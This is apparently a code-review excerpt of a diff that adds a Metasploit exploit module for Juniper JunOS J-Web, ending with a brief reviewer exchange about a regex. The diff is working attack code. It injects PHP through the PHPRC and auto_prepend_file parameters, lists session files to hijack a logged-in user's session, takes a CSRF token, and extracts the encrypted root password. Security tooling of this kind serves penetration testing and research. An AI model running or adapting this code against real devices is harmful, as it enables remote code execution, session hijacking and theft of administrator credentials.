modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb

```diff
@@ -0,0 +1,272 @@
+    post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\""
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'data' => post_data,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        'PHPRC' => phprc
+      }
+    )
+  end
+
+  def get_php_session_id
+    get_var_sess = "<?php print_r(scandir('/var/sess'));?>"
+    res = send_php_exploit('/dev/fd/0', get_var_sess)
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+    php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
+
+    fail_with(Failure::UnexpectedReply, "Failed to retrieve PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
+    print_status("Found PHPSESSID: #{php_session_id}.")
+    php_session_id
+  end
+
+  def get_csrf_token(php_session_id)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diagnose'),
+      'method' => 'GET',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}"
+        },
+      'vars_get' => {
+        'm[]' => 'pinghost'
+      }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+    csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token
+    print_status("Found csrf token: #{csrf_token}.")
+    csrf_token
+  end
+
+  def get_encrypted_root_password(php_session_id, csrf_token)
+    post_data = "rs=get_cli_data&rsargs[]=getQuery&csrf_token=#{csrf_token}&key=1"
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'jsdm', 'ajax', 'cli-editor.php'),
+      'method' => 'POST',
+      'data' => post_data,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}"
+        }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+    # Multiple passwords are displayed in the output, we want to grab the system section first before attempting to located a password
+    system_section = res.body.scan(/system \{([^}]+)\}/m).flatten[0]
```

Comment:
Maybe add an example of what we're looking for here, as a comment, since the regex might be a tad cryptic.

Reply:
Good call, cleaned up the regex and added and example of the response body being analyzed.